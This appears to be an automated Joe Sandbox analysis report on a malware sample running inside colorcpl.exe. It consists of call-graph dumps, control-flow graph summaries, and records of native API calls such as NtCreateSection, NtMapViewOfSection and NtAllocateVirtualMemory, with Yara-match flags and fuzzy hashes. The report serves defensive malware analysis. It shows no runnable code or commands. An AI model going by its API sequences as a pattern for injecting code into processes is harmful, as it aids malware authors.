102395->102396 102397 2889fcc 102396->102397 102405 48d2f30 LdrInitializeThunk 102397->102405 102398 287f4ee 102398->102392 102400 288a000 102398->102400 102401 288af50 LdrLoadDll 102400->102401 102402 288a01c 102401->102402 102406 48d2d10 LdrInitializeThunk 102402->102406 102403 287f51e 102403->102377 102405->102398 102406->102403 102408 288bf80 2 API calls 102407->102408 102409 2889887 102408->102409 102428 2879310 102409->102428 102411 28898a2 102412 28898c9 102411->102412 102413 28898e0 102411->102413 102414 288bdb0 2 API calls 102412->102414 102415 288bd30 2 API calls 102413->102415 102416 28898d6 102414->102416 102417 288991a 102415->102417 102416->102380 102418 288bd30 2 API calls 102417->102418 102419 2889933 102418->102419 102425 2889bd4 102419->102425 102434 288bd70 LdrLoadDll 102419->102434 102421 2889bb9 102422 2889bc0 102421->102422 102421->102425 102423 288bdb0 2 API calls 102422->102423 102424 2889bca 102423->102424 102424->102380 102426 288bdb0 2 API calls 102425->102426 102427 2889c29 102426->102427 102427->102380 102429 2879335 102428->102429 102430 287ace0 LdrLoadDll 102429->102430 102431 2879368 102430->102431 102433 287938d 102431->102433 102435 287cf10 102431->102435 102433->102411 102434->102421 102436 287cf3c 102435->102436 102437 288a1d0 LdrLoadDll 102436->102437 102438 287cf55 102437->102438 102439 287cf5c 102438->102439 102446 288a210 102438->102446 102439->102433 102443 287cf97 102444 288a480 2 API calls 102443->102444 102445 287cfba 102444->102445 102445->102433 102447 288af50 LdrLoadDll 102446->102447 102448 288a22c 102447->102448 102454 48d2ca0 LdrInitializeThunk 102448->102454 102449 287cf7f 102449->102439 102451 288a800 102449->102451 102452 288af50 LdrLoadDll 102451->102452 102453 288a81f 102452->102453 102453->102443 102454->102449 102456 288af50 LdrLoadDll 102455->102456 102457 2889e9c 102456->102457 102460 48d2dd0 LdrInitializeThunk 102457->102460 102458 287f69e 102458->102312 102460->102458 102461 2889070 102462 288bd30 2 API calls 102461->102462 102464 28890ab 102461->102464 102462->102464 102463 288918c 102464->102463 102465 287ace0 LdrLoadDll 102464->102465 102466 28890e1 102465->102466 102467 2884e40 LdrLoadDll 102466->102467 102468 28890fd 102467->102468 102468->102463 102469 2889110 Sleep 102468->102469 102472 2888c90 LdrLoadDll 102468->102472 102473 2888ea0 LdrLoadDll 102468->102473 102469->102468 102472->102468 102473->102468 102474 48d2ad0 LdrInitializeThunk

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • NtQueryInformationProcess.NTDLL ref: 0476A19F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551472869.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4760000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InformationProcessQuery
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 1778838933-4108050209
                                                                                                                                                                          • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                                                                          • Instruction ID: a7dc163b2de785cf92c9a52675917680b32646c98afa49c0a6d92ddc9a2a5c24
                                                                                                                                                                          • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                                                                          • Instruction Fuzzy Hash: 40F14270928A4C8FDB69EF68C898AEE77E1FF99304F40462AD84BD7250DF34A545CB41

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 209 4769baf-4769bef 210 4769bf7-4769bfe 209->210 211 4769bf2 call 4769102 209->211 212 4769c00 210->212 213 4769c0c-4769c9a call 476b942 * 2 NtCreateSection 210->213 211->210 214 4769c02-4769c0a 212->214 219 4769ca0-4769d0a call 476b942 NtMapViewOfSection 213->219 220 4769d5a-4769d68 213->220 214->213 214->214 223 4769d52 219->223 224 4769d0c-4769d4c 219->224 223->220 226 4769d4e-4769d4f 224->226 227 4769d69-4769d6b 224->227 226->223 228 4769d6d-4769d72 227->228 229 4769d88-4769ddc call 476cd62 NtClose 227->229 230 4769d74-4769d86 call 4769172 228->230 230->229
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551472869.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4760000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Section$CloseCreateView
                                                                                                                                                                          • String ID: @$@
                                                                                                                                                                          • API String ID: 1133238012-149943524
                                                                                                                                                                          • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                                                                                                          • Instruction ID: 22e45dfe3fc603aa49d5a144e797c902b9d5d7bd54164490875fd5330a6d58f8
                                                                                                                                                                          • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                                                                                                          • Instruction Fuzzy Hash: AF6194B0118B088FCB58DF58D8856AABBE1FF98314F50062EE98BC3251DF35E441CB46

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 268 4769bb2-4769bfe call 4769102 271 4769c00 268->271 272 4769c0c-4769c9a call 476b942 * 2 NtCreateSection 268->272 273 4769c02-4769c0a 271->273 278 4769ca0-4769d0a call 476b942 NtMapViewOfSection 272->278 279 4769d5a-4769d68 272->279 273->272 273->273 282 4769d52 278->282 283 4769d0c-4769d4c 278->283 282->279 285 4769d4e-4769d4f 283->285 286 4769d69-4769d6b 283->286 285->282 287 4769d6d-4769d72 286->287 288 4769d88-4769ddc call 476cd62 NtClose 286->288 289 4769d74-4769d86 call 4769172 287->289 289->288
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551472869.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4760000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Section$CreateView
                                                                                                                                                                          • String ID: @$@
                                                                                                                                                                          • API String ID: 1585966358-149943524
                                                                                                                                                                          • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                                                                          • Instruction ID: a0a7cf9079720a19fb5395fa9250bf335ab933fbc4da713d4f9007938abad229
                                                                                                                                                                          • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                                                                          • Instruction Fuzzy Hash: BB5170B0518B088FD758DF18D8956AABBE1FB88314F50062EE98AD3651DF35E441CB86

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 414 288a34a-288a3a1 call 288af50 NtCreateFile
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02884BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02884BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0288A39D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          • String ID: .z`$t8U-
                                                                                                                                                                          • API String ID: 823142352-2974142577
                                                                                                                                                                          • Opcode ID: 06ce2941d002046ee9495b8d1b776df103e8e31f9be89660521317f8a214df82
                                                                                                                                                                          • Instruction ID: f43ac4e70842dca45b76583c6c735f6ba06a28ef57360c1f587988657b90e5dd
                                                                                                                                                                          • Opcode Fuzzy Hash: 06ce2941d002046ee9495b8d1b776df103e8e31f9be89660521317f8a214df82
                                                                                                                                                                          • Instruction Fuzzy Hash: 99F0B2B6201108AFDB08CF89DC94EEB77A9AF8C754F158649FA1DA7240C630E811CBA4

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • NtQueryInformationProcess.NTDLL ref: 0476A19F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551472869.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4760000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InformationProcessQuery
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 1778838933-4108050209
                                                                                                                                                                          • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                                                          • Instruction ID: a729256797246f4537364d640fc46c9a6fda2af2e20eaffd80dc496e9095dfc6
                                                                                                                                                                          • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                                                          • Instruction Fuzzy Hash: 05514E70914A9C8FDB69EF68C8986EEB7F5FB98304F40462ED84AD7210DF309645CB41

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 560 288a350-288a366 561 288a36c-288a3a1 NtCreateFile 560->561 562 288a367 call 288af50 560->562 562->561
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02884BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02884BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0288A39D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          • String ID: .z`
                                                                                                                                                                          • API String ID: 823142352-1441809116
                                                                                                                                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                          • Instruction ID: 9352f1a054460b6d3c3e3ef835f3c51ccba40cbc1b3c49e404e172d29156cef6
                                                                                                                                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                          • Instruction Fuzzy Hash: 7DF0BDB6200208AFCB08DF88DC84EEB77ADAF8C754F158248BA1D97240C630E8118BA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtReadFile.NTDLL(02884D62,5EB65239,FFFFFFFF,02884A21,?,?,02884D62,?,02884A21,FFFFFFFF,5EB65239,02884D62,?,00000000), ref: 0288A445
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                          • Opcode ID: 812ca50ff83fe480692b37d25799524cee555170e303affc6de07c71bbf7608d
                                                                                                                                                                          • Instruction ID: b807e0830190545601e2dc1790d3c69380abf955c93a64c3127dbfc9b37164b0
                                                                                                                                                                          • Opcode Fuzzy Hash: 812ca50ff83fe480692b37d25799524cee555170e303affc6de07c71bbf7608d
                                                                                                                                                                          • Instruction Fuzzy Hash: 81F0E2B6200108ABCB18DF88DC80EEB77A9EF8C714F118248BA1D97245C630E8128BA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtReadFile.NTDLL(02884D62,5EB65239,FFFFFFFF,02884A21,?,?,02884D62,?,02884A21,FFFFFFFF,5EB65239,02884D62,?,00000000), ref: 0288A445
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                          • Instruction ID: 81f76cf1d93b6233e1f277781d56e2946f92e222899c409992ebf0c3417118c4
                                                                                                                                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                          • Instruction Fuzzy Hash: E0F0A4B6200208AFCB18DF89DC80EEB77ADAF8C754F158249BA1D97241D630E8118BA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02872D11,00002000,00003000,00000004), ref: 0288A569
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2167126740-0
                                                                                                                                                                          • Opcode ID: c397e281fe5eec2509f839a32940c8b83a254afbab70aa7c82889e9359b75f09
                                                                                                                                                                          • Instruction ID: 6dd146f8f138744f241511ba6d7703871e9b4c9c5599a33525776d2022d33acc
                                                                                                                                                                          • Opcode Fuzzy Hash: c397e281fe5eec2509f839a32940c8b83a254afbab70aa7c82889e9359b75f09
                                                                                                                                                                          • Instruction Fuzzy Hash: AEF0F8B6210208ABDB18DF89DC81EE777A9AF88754F118549BA1897241C631E911CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02872D11,00002000,00003000,00000004), ref: 0288A569
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2167126740-0
                                                                                                                                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                          • Instruction ID: ff243c28abbf09ec76bc74a9f8dd113aa33ab394027c91e75819ad57080fb1be
                                                                                                                                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                          • Instruction Fuzzy Hash: 7FF015B6200208AFCB18DF89CC80EAB77ADAF88754F118149BE1C97241C630F810CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtClose.NTDLL(02884D40,?,?,02884D40,00000000,FFFFFFFF), ref: 0288A4A5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Close
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                          • Instruction ID: e1701c70a426e4b577d900084bbe500b6fd3706dba3ce76ea7bbd4ad085ed492
                                                                                                                                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                          • Instruction Fuzzy Hash: F4D0177A200214ABD714EB98CC85EA77BADEF48760F154499BA1C9B282C530FA008AE0
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtClose.NTDLL(02884D40,?,?,02884D40,00000000,FFFFFFFF), ref: 0288A4A5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Close
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                                          • Opcode ID: ac6636927d098083ec32d022959660a9c15f7336b56e9d825ac5b988cf23a93d
                                                                                                                                                                          • Instruction ID: 7edc32a10ec1bb45f33132864beb86a2a9d6c0bfd63dfa296f788842c1e7653b
                                                                                                                                                                          • Opcode Fuzzy Hash: ac6636927d098083ec32d022959660a9c15f7336b56e9d825ac5b988cf23a93d
                                                                                                                                                                          • Instruction Fuzzy Hash: 79E08C7A640200AFD714EFA8CC85EAB7B69EF84350F14455EB91D9B292C530A9008BD0
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: ac9cf0130992e23276764f7cb54d347769dd5b9e63e0d6a227cf391d3fc50b7b
                                                                                                                                                                          • Instruction ID: a4f15b910ec1295ae7b56a2668f4b64719383a6662055bdfe023badfc9edce83
                                                                                                                                                                          • Opcode Fuzzy Hash: ac9cf0130992e23276764f7cb54d347769dd5b9e63e0d6a227cf391d3fc50b7b
                                                                                                                                                                          • Instruction Fuzzy Hash: FF90023120140416F1007599540865A00058BE1305F55D511A6029655EC665D9D57132
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 22e2516eac0535448c776ad8b678a01f2a896941f727c103f7203e2223a5f525
                                                                                                                                                                          • Instruction ID: 2bec9ce58ca1db34d380f535da4abe670d102f7f8c947198485fe91aeea96a44
                                                                                                                                                                          • Opcode Fuzzy Hash: 22e2516eac0535448c776ad8b678a01f2a896941f727c103f7203e2223a5f525
                                                                                                                                                                          • Instruction Fuzzy Hash: 7D90023120140856F10071594404B5A00058BE1305F55C516A1129754D8615D9957522
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 02ef55f1e45b97a4105acedcbc420d6abb8a839e9054e6dab8664d24d3e6e3aa
                                                                                                                                                                          • Instruction ID: 24e9ba3d1fc10d63d939ad71bcbf804a22947300e07c3f98cf7dd6979ac44628
                                                                                                                                                                          • Opcode Fuzzy Hash: 02ef55f1e45b97a4105acedcbc420d6abb8a839e9054e6dab8664d24d3e6e3aa
                                                                                                                                                                          • Instruction Fuzzy Hash: CF90023120148816F1107159840475E00058BD1305F59C911A5429758D8695D9D57122
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 4dd8411ee801caa2bfba3fa4e509acb5f06c432e17dd7e0132bf9928a4e90902
                                                                                                                                                                          • Instruction ID: 3ec572ff02e73d0768e4ede96c8d84aa65312070401c121fb8d292a3f571e8ef
                                                                                                                                                                          • Opcode Fuzzy Hash: 4dd8411ee801caa2bfba3fa4e509acb5f06c432e17dd7e0132bf9928a4e90902
                                                                                                                                                                          • Instruction Fuzzy Hash: 85900221242441667545B159440451B40069BE1245795C512A2419A50C8526E99AE622
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 99d2d6727c7efced7887c56adb6d2e6c50ed2d64d0e9e2160351e1037f73d902
                                                                                                                                                                          • Instruction ID: 41dbfe23da0c1ad322e54196506fff2e992527f1fc9949ac3ad04326f413a77a
                                                                                                                                                                          • Opcode Fuzzy Hash: 99d2d6727c7efced7887c56adb6d2e6c50ed2d64d0e9e2160351e1037f73d902
                                                                                                                                                                          • Instruction Fuzzy Hash: 4790023120140427F1117159450471B00098BD1245F95C912A1429658D9656DA96B122
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: ee0ccf88f5d088b9251c4e08c43c9b7adf3c019a9f56625dbe22493b344e240e
                                                                                                                                                                          • Instruction ID: dbc599ee937619a32d64ff4921773a22e4635d6598796b297183a07b7c9dada8
                                                                                                                                                                          • Opcode Fuzzy Hash: ee0ccf88f5d088b9251c4e08c43c9b7adf3c019a9f56625dbe22493b344e240e
                                                                                                                                                                          • Instruction Fuzzy Hash: F290022921340016F1807159540861E00058BD2206F95D915A101A658CC915D9AD6322
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 7faa98705fd0ad3f8a274c666049d88fbc283d848de222c31f0bbfc14b260409
                                                                                                                                                                          • Instruction ID: 3646c038e071abb6173a28303e5733e4fc3cd72203956ccfefcd91fde74f977f
                                                                                                                                                                          • Opcode Fuzzy Hash: 7faa98705fd0ad3f8a274c666049d88fbc283d848de222c31f0bbfc14b260409
                                                                                                                                                                          • Instruction Fuzzy Hash: 5190027120140416F1407159440475A00058BD1305F55C511A6069654E8659DED97666
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
